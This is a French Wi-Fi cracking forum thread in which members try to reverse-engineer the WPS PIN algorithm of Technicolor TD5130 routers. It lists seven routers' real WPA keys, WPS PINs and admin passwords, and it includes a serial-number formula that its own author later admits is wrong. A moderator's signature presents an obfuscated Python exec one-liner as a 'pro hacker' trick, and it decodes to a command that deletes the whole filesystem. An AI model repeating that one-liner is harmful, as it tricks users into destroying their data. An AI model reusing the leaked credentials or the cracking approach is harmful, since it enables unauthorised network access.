Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 11-06-2013 16:49:14

unsuns06
Membre Radioactif
Inscription : 10-04-2013
Messages : 68

Technicolor TD5130 00:18:E7

Bonjour à tous,

Suite à ma discussion avec kcdtv, je propose de lancer une étude sur les Technicolor TD5130 00:18:E7:XX:XX:XX

Voici les données complètes sur ce lien : http://www.jheberg.net/captcha/MhwGyF-tncap-rar

La piste privilégiée pour l'instant est de retrouver l'algorithme WPS/MAC, si vous en avez d'autres pourquoi pas smile.

Le WPS est activé par défaut, cependant il y a un blocage de 5 minutes au bout de 3 tentatives erronées.

J'ai essayé avec Reaver, ça prend énormément de temps ( environ 70 secondes/PIN).

Merci à tous.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 12-06-2013 08:30:22

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : Technicolor TD5130 00:18:E7

Plutôt que d'utiliser une plateforme d'upload qui peut mourir un jour au l'autre, je te conseille d'utiliser l'upload de crack-wifi.com, ce sera plus cohérent (:

Et tant qu'à faire, tu peux peut-être coller tes données dans un post, ça rentre non ?

Bonne initiative en tout cas.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#3 13-06-2013 19:14:06

unsuns06
Membre Radioactif
Inscription : 10-04-2013
Messages : 68

Re : Technicolor TD5130 00:18:E7

Voila smile

Routor: TD5130
SSID: TNCAP9388E8
WPA-Key: 580C05A631
WPS-Pin:90467912
Admin-Pass: kcfx
MAC: 0018E79388E8
SN: 1150A1D05173
GW: DSLBE5130MAE1


Routor: TD5130
SSID: TNCAP948BE4
WPA-Key: 079A40DEFB
WPS-Pin: 37017422
Admin-Pass: et3p
MAC: 0018E7948BE4
SN: 1150A1D18433
GW: DSLBE5130MAE1


Routor: TD5130
SSID: TNCAP96C99F
WPA-Key: F3D70D3689
WPS-Pin: 12456789
Admin-Pass: 00jr
MAC: 0018E796C99F
SN: 1201A1D08658
GW: DSLBE5130MAE1


Routor: TD5130
SSID: TNCAPA4CAFF
WPA-Key: 5E00C7B723
WPS-Pin: 71095837
Admin-Pass: efop
MAC: 0018E7A4CAFF
SN: 1211A1D03863
GW: DSLBE5130MAE1


Routor: TD5130
SSID: TNCAP936D45
WPA-Key: 4E35E2A17A
WPS-Pin: 90427145
Admin-Pass: 2ggr
MAC: 0018E7936D45
SN: 1150A1D03750
GW: DSLBE5130MAE1


Routor: TD5130
SSID: TNCAP938028
WPA-Key: 3BC2B03785
WPS-Pin: 15061591
Admin-Pass: x0ym
MAC: 0018E7938028
SN: 1150A1D04725
GW: DSLBE5130MAE1

Routor: TD5130
SSID: TNCAP941A8D
WPA-Key: 842B159901
WPS-Pin: 79489515
Admin-Pass: sthh
MAC: 0018E7941A8D
SN: 1150A1D12630
GW: DSLBE5130MAE1

Hors Ligne

#4 14-06-2013 20:52:30

nabbouti
Membre Hyperactif
Inscription : 30-08-2012
Messages : 60

Re : Technicolor TD5130 00:18:E7

unsus ,ce routeur de meme model que thomson V8 2012 ,comme j ai dit resiste face  reaver,meme si tu connais le Wps PIN et tu tape -p PIN ca donnera rien

Hors Ligne

#5 15-06-2013 12:10:43

unsuns06
Membre Radioactif
Inscription : 10-04-2013
Messages : 68

Re : Technicolor TD5130 00:18:E7

Si tu as le bon PIN bien sur que ca marchera ! Sinon comment ferait un utilisateur pour se connecter ? wink

Hors Ligne

#6 15-06-2013 21:04:00

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Technicolor TD5130 00:18:E7

L'implémentation du WPS est quelque chose de cahotique, tout le monde en fait un peu à sa tête, tu as même la cas absurde du router amper asl2566 qui oui utilise le WPS mais NON ne respecta pas la règle du checksum.
Le problème c'est que toutes les applications côté client le respecte, donc on ne pas utiliser le WPS car elles n'envoient pas de PIN sans checksum valide.
Le plus dròle c'est que il y a une mod de revaer expressément pour ce routeur qui envoie des pIN sans checksum valide, donc ce routeur un WPS uniquement compatible et utilisable avec " reaver modificado " lol

Certains routeurs (comme le mien) on un PIN par défaut attribué (le même à chaque reboot) tout est configuré et on peu le voir avec wash, mais, jusqu'à ce que je coche "enable WPS" il ne marchera pas... ni pour se connecter, ni avec reaver.
Je pourrais te citer quelques cas en plus comme le tecom aws et d'autres routeurs qui avec la configuration par défaut on tout qui est prët à emploie, et tu peux même voir wps dans les probes mais le protocole n'est pas opérationnel sans qu'il était explicitement activé par l'utilisateur.

le Wps PIN et tu tape -p PIN ca donnera rien

l'option -p peut ne pas bien fonctionner..... attention de bien avoir installé la 1.3 ou la dernière révision de la 1.4

Ce qui m'attire l'attention c'est ce pass singulier à chaque routeur pour l'accès à l'interface de configuration, je regarderais si je ne vois pas une relation PIN-pass et voir si on en peut pas déterminer le pass vu que relation PIN avec bssid-essid-serial je ne vois rien...

Hors Ligne

#7 15-06-2013 23:52:14

unsuns06
Membre Radioactif
Inscription : 10-04-2013
Messages : 68

Re : Technicolor TD5130 00:18:E7

Peut-être mais ce serait bien dommage vu que le pass reste confidentiel hmm

Ici le checksum est-il respecté ?

Sur lampiweb il y aurait pas quelqu'un qui pourrait étudier ca ? J'ai vu qu'ils avaient beaucoup de gens compétents.

Dernière modification par unsuns06 (16-06-2013 00:07:47)

Hors Ligne

#8 16-06-2013 17:59:27

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Technicolor TD5130 00:18:E7

Peut-être mais ce serait bien dommage vu que le pass reste confidentiel

Ce serait plus facile si c'était bssid passé à décimal, on est bien d'accord. wink

Ici le checksum est-il respecté

Oui.
Si tu veux plus d'info sur le checksum WPS

Coder la fonction du checksum sur le huitième chiffre des PIN WPS



Sur lampiweb il y aurait pas quelqu'un qui pourrait étudier ca ? J'ai vu qu'ils avaient beaucoup de gens compétents.

Il y a déjà beaucoup d'études en cours et de défis à relever....
Si tu le souhaites je peux passer les données au groupe de travail.

Hors Ligne

#9 16-06-2013 19:32:03

unsuns06
Membre Radioactif
Inscription : 10-04-2013
Messages : 68

Re : Technicolor TD5130 00:18:E7

Oui j'aimerais bien même si je les ai déjà transmis à Maripuri au mois de Novembre dernier sans réponse hmm.

Hors Ligne

#10 16-06-2013 19:45:26

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Technicolor TD5130 00:18:E7

si tu les as envoyé à maripuri nous les avons wink

Hors Ligne

#11 18-06-2013 15:22:51

nabbouti
Membre Hyperactif
Inscription : 30-08-2012
Messages : 60

Re : Technicolor TD5130 00:18:E7

merci pour vous tous,pour vous rappeler,j ai fait 3 essaies pour trouver le wps PIN pour ce routeur
1 ere essaie : reaver avec la version SVN ,ca passe 99 pourcent sans avoir le PIN
2eme essaie : j ' ai acheté un technicolor 5130 et tester WPS pin affiché sous la boite ......rien .....2eme  echec
3eme essai      ca depasse 98 pourcent sans resultat M1 M2 M3 M4 sans M5 ou M6

alors le cheksum n est pas respecte sois y a  de protocoles mis a jour sur ce modele .
la carte wifi que j ai utilisé est RT8187L

Hors Ligne

#12 18-06-2013 15:26:45

nabbouti
Membre Hyperactif
Inscription : 30-08-2012
Messages : 60

Re : Technicolor TD5130 00:18:E7

unsuns06 a écrit :

Si tu as le bon PIN bien sur que ca marchera ! Sinon comment ferait un utilisateur pour se connecter ? wink

je me connecte a technicolor sans wpspin si tu a le code wpa

Hors Ligne

#13 18-06-2013 15:29:05

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Technicolor TD5130 00:18:E7

Pour savoir si le checksum est respecté c'est simple; si reaver envoie le PIN en question c)est que le checksum est respecté,
Sinon il essaye un le PIN valable en se basant sur les 7 premiers chiffres.
example: Si vous mettez -p 12345679, wps reaver ne va pas envoyer ce PIN mais va envoyer 12345670 (checksum valide}

Hors Ligne

#14 19-06-2013 15:16:19

unsuns06
Membre Radioactif
Inscription : 10-04-2013
Messages : 68

Re : Technicolor TD5130 00:18:E7

L'aide de M1CK3Y serait grandement appréciée ici wink

Hors Ligne

#15 21-06-2013 02:23:41

TNCAP
Membre
Inscription : 19-06-2013
Messages : 13

Re : Technicolor TD5130 00:18:E7

slaut les amis

pour ce routeur Technicolor TD5130 00:18:E7 ,je suis sur et certain qu'il ya une relation BSSID et pin ,d'ailleurs il y'as une relation essid et bssid ,le essid c'est le TNCAP xxxxx ET LES XXXXXX c'est les derniers caractères de l'adresse MAC .en convertissant ces derniers caractères en Décimal ,et en essaye de trouver le rapports entre les pins et le chiffres décimal à 7 némuros  gfénérés de la conversion de 6 derniers caractéres du MAC,c'est sur qu'il ya une relation ,je suis convaincu et je contunierais de chercher cette formule

Dernière modification par TNCAP (21-06-2013 02:30:56)

Hors Ligne

#16 21-06-2013 03:10:37

TNCAP
Membre
Inscription : 19-06-2013
Messages : 13

Re : Technicolor TD5130 00:18:E7

j'ai fait des claculs:

MAC:                        MAC DECIMAL                 CHEKSUM MAC DECIMAL                           pin REEL
TNCAP9388E8             9668840                               3                                                    90467912
TNCAP948BE4             9735140                                5                                                    37017422
TNCAP96C99F             9882015                                 3                                                    12456789
TNCAPA4CAFF             10799871                               ---                                                  71095837
TNCAP936D45             9661765                                 6                                                    90427145
TNCAP938028             9666600                                 5                                                    15061591
TNCAP941A8D             9706125                                 0                                                    79489515

essayons de trouver la relation entre le PIN calculé et le pin reel ,c'est sur qu'il ya une formule

remarquez d'abord que les PIN calculés sont superieurs que les PIN reel sauf le quatrieme qui a été genéré à 8 chiffres sans cheksum

Dernière modification par TNCAP (21-06-2013 03:30:35)

Hors Ligne

#17 21-06-2013 08:22:46

unsuns06
Membre Radioactif
Inscription : 10-04-2013
Messages : 68

Re : Technicolor TD5130 00:18:E7

Oui j'ai commencé sur cette piste mais ca n'a rien donné hmm.

Hors Ligne

#18 24-06-2013 12:31:30

TNCAP
Membre
Inscription : 19-06-2013
Messages : 13

Re : Technicolor TD5130 00:18:E7

salut mon ami  unsuns06

je crois que la relation exite et elle est bien la ,
je m'explique :
en multipliant les six derniers chiffres de la BSSID par lui même et on le divise par  le némuro de serie et bien ça donne un nombre fixe de 5
essaye :
Routor: TD5130
SSID: TNCAP9388E8
WPA-Key: 580C05A631
WPS-Pin:90467912
Admin-Pass: kcfx
MAC: 0018E79388E8
SN: 1150A1D05173
GW: DSLBE5130MAE1

Routor: TD5130
SSID: TNCAP948BE4
WPA-Key: 079A40DEFB
WPS-Pin: 37017422
Admin-Pass: et3p
MAC: 0018E7948BE4
SN: 1150A1D18433
GW: DSLBE5130MAE1

pour le premier :
9388E8*9388E8=550683A75240
550683A75240/1150A1D05173= 5

pour le deuxieme :

948BE4*948BE4 = 56320C116310
56320C116310/1150A1D18433= 5



essaye pour les autres c'et pareil ,j'espère qu'on est sur la bonne voix mais je lacherais à jamais ce type de routeur
allez les amis aidez nous

voila déja à partir de la BSSID  on peux en déduire le némuro de serie


donc ESSID² = fct(BSSID) = 5 * S/N

Dernière modification par TNCAP (24-06-2013 12:53:57)

Hors Ligne

#19 24-06-2013 12:58:19

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Technicolor TD5130 00:18:E7

Yes!
Excellente avancée! smile
Ce soir je regqrderais tout ca tranquillement, trouver une relation bssid serial c'est faire la moitie du chemin à mon avis.
Bravo smile

PS= Tu dois être pas mauvais du tout dans la partie "chiffre" dans "des chiffres et des lettres" tongue

Hors Ligne

#20 24-06-2013 13:13:33

TNCAP
Membre
Inscription : 19-06-2013
Messages : 13

Re : Technicolor TD5130 00:18:E7

smile C'est faux , c'est à cause des calcultarices en ligne

Hors Ligne

#21 24-06-2013 17:05:41

unsuns06
Membre Radioactif
Inscription : 10-04-2013
Messages : 68

Re : Technicolor TD5130 00:18:E7

Bravo les gars, à ce soir ! wink

Hors Ligne

#22 24-06-2013 18:49:29

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Technicolor TD5130 00:18:E7

Question Messieurs ?



Est-ce un routeur utilisée sur des box de FAI en France ?

Si oui, pouvons en parler ?
Si non, quel sont les FAI etrangers utilisant ce type de routeur ?


Merci wink


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#23 24-06-2013 21:09:12

TNCAP
Membre
Inscription : 19-06-2013
Messages : 13

Re : Technicolor TD5130 00:18:E7

Furyo a écrit :

Question Messieurs ?



Est-ce un routeur utilisée sur des box de FAI en France ?

Si oui, pouvons en parler ?
Si non, quel sont les FAI etrangers utilisant ce type de routeur ?


Merci wink

ce routeur n'est pas utilisé sur les FAI en france,rassure toi,sur les FAI de la rive sud du méditerranée, technicolor à décroché des marchés
bref,peu importe les FAI ,ce retour résiste au brute force REAVER ,et ce qui est encourageant de chercher un simple algorithme générateur WPS c'est que l'adresse MAC wlan de ce retour appartient à Cameo Communications;groupe chinois et la plupart des algorithme ont été détécté facilement sur les produits chinois .
un grand merci à tous le monde

Dernière modification par TNCAP (24-06-2013 21:10:27)

Hors Ligne

#24 24-06-2013 22:25:24

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Technicolor TD5130 00:18:E7

technicolor c'est le nouveau nom de thomson dans ce secteur, tu peux trouver des FAI en espagne, au portugal, maroc, grèce, turquie, mexique etc... qui distribuent du technicolor.

J'aurais tendance à supposer en voyat cela que PIN et pass sont des parties d'une chaîne plus grande, ce qui brouille les pistes, mais à mon avis on n'est pas loin...  smile

Hors Ligne

#25 25-06-2013 17:57:00

TNCAP
Membre
Inscription : 19-06-2013
Messages : 13

Re : Technicolor TD5130 00:18:E7

salut les amis:

le centre de recherche de Technicolor de rennes a un contrat de recherche avec l'université de rennes .

j'ai vu une these qui parle de handshake et d'algorithme générateur de code ......
voila le liens :
tel.archives-ouvertes.fr/docs/00/65/95/35/PDF/these_lecomte_2011.pdf

pour toute la liste des théses voila le lien :

http://www.rennes.supelec.fr/ren/rd/scee/ftp/theses/

j'espère que ca va aider quan même :
salut

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
0 2309 03-02-2015 23:17:52 par Faouzi47
33 4816 29-09-2014 23:14:49 par kcdtv
3 3999 25-08-2014 20:40:36 par EliotFR
9 8322 14-03-2013 11:41:22 par kcdtv

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.034 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]